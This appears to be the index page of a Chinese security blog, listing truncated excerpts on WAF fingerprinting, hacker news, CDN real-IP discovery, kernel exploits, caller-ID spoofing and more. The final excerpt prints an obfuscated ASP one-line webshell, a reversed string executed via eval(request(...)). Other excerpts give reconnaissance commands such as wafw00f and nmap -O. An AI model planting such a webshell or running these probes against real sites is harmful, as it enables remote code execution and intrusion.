信息收集是怎么收集系统指纹-系统指纹收集

信息收集是怎么收集系统指纹-系统指纹收集
WAF指纹探测及识别技术 wafw00f wafwf url1 url2 url3 #用来探测WAF(运用层防火墙)的工具,会返回在这个之前有什么运用级防火墙是哪个厂商 xprobe2 xprobe2 url/ip nmap -O nmap -O target [阅读全文]
ė1025次浏览 61条评论 0 安全 渗透 信息收集 指纹

揭开中国黑客群体的神秘面纱 年薪数百万

揭开中国黑客群体的神秘面纱 年薪数百万
在网络世界有专属的代号,那里才是他们最习惯的“世界” 作为360Vulcan黑客团队的领头人,“MJ0011”最终还是决定不把他的“战利品”放在360公司的历史荣誉展览室里。一拿到全球最知名的黑客大赛——Pwn2Own的冠军,公司的几位老板就下命令式地要求他把决赛中所使用的那部电脑给“贡献”出来。 他还真是非常认真地跟团队的成员商量过这件事,但不出意外,几乎没有得到任... [阅读全文]

菲越黑客联合行动对华实施网络攻击,行动代号”OpChina”

菲越黑客联合行动对华实施网络攻击,行动代号”OpChina”
       近日,中国针对南海主权态度强硬,美国干预其中,使得越南菲律宾对侵占我国领土行为更加肆无忌惮的叫嚣,菲律宾总统阿基诺也随之强硬表态, 对中国南海“宣誓主权”,我国外交部发言人连续发声,希望彼此冷静站立在和平解决领土争端中来,我国人民不畏惧战争,但也不主动挑起战争。 中国南海情势由于美国的干预,相比往年,... [阅读全文]

2015.5.28携程网被攻击事件 携程网股票大跌

2015.5.28携程网被攻击事件 携程网股票大跌
携程今早被攻击 网站服务及App全面瘫痪 携程被攻击了,据悉今天早些时候,有网友发现携程网网站和APP内部功能不能正常使用。随后携程官方表示携程部分服务器遭不明攻击。而法制晚报则曝出更惊人的消息。有网友称携程数据库被物理删除。不过随后携程网回应,经过紧急排查,携程数据没有丢失,预订数据也保存完整。在恢复过程中,对用户造成的不便,携程深表... [阅读全文]

工信部曝光82款问题软件,其中强行捆绑推广的软件数量最多

工信部曝光82款问题软件,其中强行捆绑推广的软件数量最多
【王玄/钛媒编辑】工信部日前公布的电信服务质量通报显示,一季度工信部组织对40家手机应用商店架上软件进行检测,发现存在问题的应用软件82款,涉及违规收集用户个人信息、恶意“吸费”、软件自动向外发送短信、强行捆绑推广其他无关应用软件等问题。 其中,强行捆绑推广其他无关应用软件的问题软件数量最多,腾讯新闻、酷我音乐、百度手机助手、航班助手均属于此类;未经用户同意,收集、使用用户个人... [阅读全文]
ė1053次浏览 62条评论 0 博客 安卓黑客 安全 手机病毒

java日期格式的Object类型转换成String类型的方法

封笔尘缘 | | 2015-4-13
java日期格式的Object类型转换成String类型的方法
java日期格式的Object类型转换成String类型的方法 Java代码  import java.text.DateFormat; import java.text.ParseException; import java.text.SimpleDateFormat; import java.util.Da... [阅读全文]

用java实现openssl的md5加密

用java实现openssl的md5加密
用java实现openssl的md5加密        來自於 封筆塵緣  【媽蛋 怎麼是繁體字 Linux下的搜狗輸入法又懷孕了】 今天写一个与C++程序通讯的模块,其中用到MD5加密,在网上找了很久,试了很久,发现这个比较拷贝,在linux中通过echo -n 'test' | opens... [阅读全文]

国内十二大网络安全研究机构盘点

国内十二大网络安全研究机构盘点
安全牛 网络安全技术研究,意味着团队、企业甚至是国家在网络安全方面的核心竞争力,安全牛整理编辑了目前国内较有影响力的安全研究机构名单,并简要列出其研发成果及相关信息,供业内人士参考。(注:本名单按机构成立时间排序) 1. 启明星辰积极防御实验室 成立时间:1999年 ... [阅读全文]

保护你的隐私:10项你必须知道的iPhone/iPad iOS 8安全设置

保护你的隐私:10项你必须知道的iPhone/iPad iOS 8安全设置
也许你并不知道,苹果iOS 8里包含了多项追踪你的地理位置和个人信息的功能,其中不少是默认开启的,很多APP和广告都在通过这些功能获取你的个人信息。如果你忽视了他们的存在,也许有一天,这些不起眼的设置就可能引发你的个人隐私泄露。 1. 限制APP在后台追踪你的位置 一些APP会在后台使用你的地理位置,即便你不在使用它。 2、阻止APP上传你的... [阅读全文]

简单获取CDN背后网站的真实IP

简单获取CDN背后网站的真实IP
事先声明: 方法可能存在漏报(嗯, 在人品差的情况下)  唔, 我们使用 www.wooyun.org 作为案例。  首先从 www.wooyun.org 服务多次挂的页面可以看出,  wooyun 使用了 baidu 的 cdn 服务, 从 wooyun 的漏洞案例上也可以知道 wooyun 使用了 ucloud 的服务, 我们可以大胆假... [阅读全文]
ė2796次浏览 61条评论 0 Linux 服务器安全 网络 安全

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)
from:http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ POC( 感谢Mickey提供的链接): https://rdot.org/forum/showthread.php?t=33... [阅读全文]
ė1683次浏览 61条评论 0 转载 漏洞测试 网络 安全

Win10安全特性之执行流保护

Win10安全特性之执行流保护
0x00 背景 微软在2015年1月22日公布了windows10技术预览版,Build号:9926。电脑管家反病毒实验室第一时间对其引入的新安全特性进行了深入分析。 众所周知,漏洞利用过程中攻击者若要执行恶意代码,需要破坏程序原有指令的的正常执行。执行流保护的作用就是在程序执行的过程中检测指令流的正常性,当发生不符合预期的情况时,及时进行异常处理。业界针对执行流... [阅读全文]
ė928次浏览 61条评论 0 微软 系统 漏洞测试 网络 安全

电力信息系统数据库安全整体解决方案

电力信息系统数据库安全整体解决方案
1.现有的电力安全体系架构 电力系统二次防护总体示意图   现有的电力安全防护体系主要包括三个方面: A、分区隔离、网络专用 根据对电网运转正常性的要求,将电网划分为不同级别的系统,分成四个大区,四个大区之间实现隔离。采用这种机制的主要目的是保障系统的可靠性和稳定性,防止低级别的,对系统有攻击性、危害性... [阅读全文]

在非越狱的iPhone上盗取App Store密码

ė1156次浏览 62条评论 0 密码破解 漏洞测试 漏洞攻击 安全

安卓APP漏洞自动挖掘

安卓APP漏洞自动挖掘
报告中详细介绍了主要的安全问题,以及测试的例子,文中采用的自动测试方法是用python做静态与动态结和自动分析,静态分析的过程如下: 点击预览 ?apk->dex->jar->class->java->正则匹配 ?apk->smali->正则匹配 反编译出Java代码进行扫描,包括: –... [阅读全文]
ė1302次浏览 60条评论 0 java 安卓破解 安全 编程

支付宝晒十年账单并不明智

封笔尘缘 | 个人文章 | 2014-12-13
支付宝晒十年账单并不明智
众所周知,支付宝从2011年开始,每到年底都会发布一个年度对帐单。今年是支付宝十周年,一个十年账单的出现,让人们 欷歔不已。虽然一方面十年的账单能够勾起人们的许多回忆,但也容易让人对十年漫长岁月里的点滴记忆有了“触痛”的感觉。剁手不过是玩笑,记忆来自于永恒和 无奈。 十年的沉淀在支付宝的大数据中,一方面可以看出支付宝保留了我们个人消费的点滴记忆,这是抹不去的。也是根深蒂固的。那么... [阅读全文]
ė1058次浏览 61条评论 0 博客 安全 个人文章

给女神一个不能拒绝你的理由——伪造任意号码拨打电话

封笔尘缘 | 网络安全 | 2014-12-10
给女神一个不能拒绝你的理由——伪造任意号码拨打电话
今天小编给心中的女(yuan)神(jie)打电话,希望能一起吃饭,女神回复:“抱歉啊,你是个好人,今天有事,先去洗澡了,呵呵” 攒了1000张好人卡的小编去找大师,“大师,我为什么总是被女神拒绝”,大师拿起小编的手机,扔到了深山里,小编恍然大悟。“大师,你是说这些事情都是浮云,丢掉就好了吗?”大师说:“连手机号码都那么挫,要手机干啥”。 得到了大师真传的... [阅读全文]

逆向函数一句话马马马

逆向函数一句话马马马
<% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function UnEncode(cc) for i = 1 to len(cc) if mid(cc,i,1)<>"日" then temp = Mid(cc, i, 1) + temp ... [阅读全文]
ė884次浏览 60条评论 0 资源 免费共享 经验 安全 渗透
Ɣ回顶部
sitemap